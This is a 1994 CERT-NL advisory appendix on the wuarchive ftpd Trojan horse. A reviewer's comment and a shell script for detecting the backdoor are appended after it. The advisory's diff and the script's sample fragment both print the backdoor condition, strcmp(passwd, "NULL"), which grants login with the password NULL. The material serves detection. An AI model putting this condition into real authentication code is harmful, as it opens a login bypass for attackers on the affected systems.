==============================================================================
Security Advisory                                                      CERT-NL
==============================================================================
Author/Source : CERT-NL (Don Stikvoort)          Index  : S-94-08.APPENDIX
Distribution  : World                            Page   : 1
Classification: Final                            Version: 1
Subject       : wuarchive ftpd Trojan Horse (APPENDIX)   Date   : 08-Apr-94
==============================================================================

Last Revised: April 7, 1994

This file is a supplement to the CERT-NL Advisory S-94-08 : wuarchive ftpd
trojan horse of 07-apr-94 and will be updated as additional information
becomes available.

Additional Information:

The Trojan horse described in CA-94:07 provides a back-door password for any
username other than "anonymous". It would be trivial for an intruder to
modify the back-door password or other details of the Trojan horse code. The
diff below will help you detect only the Trojan horse referenced in CERT's
advisory. It will not detect any other Trojan horses.

Clarifications:

1) If you have modified any version of the wuarchive ftpd and cannot install
   the new version, 2.3, you may detect the existence of the discovered
   Trojan horse with the following diff on ftpd.c:

1013,1015c1013,1014
< if ((pw == NULL || *pw->pw_passwd == '\0' ||
< strcmp(xpasswd, pw->pw_passwd)) &&
< (strcmp(passwd, "NULL"))) {
---
> if (pw == NULL || *pw->pw_passwd == '\0' ||
> strcmp(xpasswd, pw->pw_passwd)) {

2) Since the versions containing the Trojan horse were found in a number of
   locations, it is possible that your version of the wuarchive ftpd software
   contains the Trojan horse regardless of the distribution site from which
   you obtained the source code.

3) If you have any questions concerning the wuarchive ftpd software, send
   mail to:

   Bryan D. O'Connor               Office of the Network Coordinator
   bryan@fegmania.wustl.edu        Washington University in Saint Louis
   http://fegmania.wustl.edu/~bryan

==============================================================================
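
Review bot: In the diff under clarification 1, the third `<` line, `(strcmp(passwd, "NULL"))) {`, ANDs the whole check with a comparison of the plaintext password against a constant, so the `if` body is skipped whenever the supplied password is the literal string NULL, even when `pw == NULL` or the `strcmp(xpasswd, pw->pw_passwd)` comparison fails. The condition should be exactly the two-line `>` form, with no comparison of `passwd` against a fixed string. The text does not say which file is on which side of the diff, so it would help to state that the `<` lines are the Trojan horse form and the `>` lines the expected one, and that the 1013-1015 line numbers will not match a locally modified ftpd.c.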
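
A way to run the check from clarification 1 on a locally modified ftpd.c without depending on line numbers, as an added example that is not part of the CERT-NL advisory or the wuarchive ftpd distribution. The function names, the sample fragments (built from the two sides of the advisory's diff) and the broader search for any string literal are assumptions of this example; a clean result rules out only this comparison, not other Trojan horses.

```shell
#!/bin/sh
# Added example (not from the advisory): search ftpd.c for the back-door
# comparison without relying on line numbers or whitespace layout.
# Return status: 0 = suspicious comparison found, 1 = none found, 2 = unreadable.
scan_ftpd_source() {
    src=$1
    [ -r "$src" ] || { echo "cannot read: $src" >&2; return 2; }

    # Delete all whitespace so a condition split across lines, as in the
    # advisory's diff, becomes one searchable string.
    flat=$(tr -d ' \t\r\n' < "$src")

    # Exact form shown on the "<" side of the advisory's diff.
    if printf '%s\n' "$flat" | grep -F -q 'strcmp(passwd,"NULL")'; then
        echo "$src: known back-door comparison strcmp(passwd, \"NULL\") found"
        return 0
    fi

    # Assumption of this example: a changed back-door password would still be
    # a comparison of the plaintext password with some string literal.
    hits=$(printf '%s\n' "$flat" | grep -o -E 'strcmp\(passwd,"[^"]*"\)' | sort -u)
    if [ -n "$hits" ]; then
        echo "$src: plaintext password compared with a literal, review by hand:"
        printf '%s\n' "$hits"
        return 0
    fi
    return 1
}

# Constructed sample input: the two sides of the advisory's diff saved as
# fragments (not complete ftpd.c files), for trying the function offline.
make_samples() {
    dir=$1
    cat > "$dir/trojaned.c" <<'EOF'
if ((pw == NULL || *pw->pw_passwd == '\0' ||
    strcmp(xpasswd, pw->pw_passwd)) &&
    (strcmp(passwd, "NULL"))) {
EOF
    cat > "$dir/clean.c" <<'EOF'
if (pw == NULL || *pw->pw_passwd == '\0' ||
    strcmp(xpasswd, pw->pw_passwd)) {
EOF
}
```

Call `scan_ftpd_source` with the path to your own ftpd.c; `make_samples DIR` only writes the two demonstration fragments.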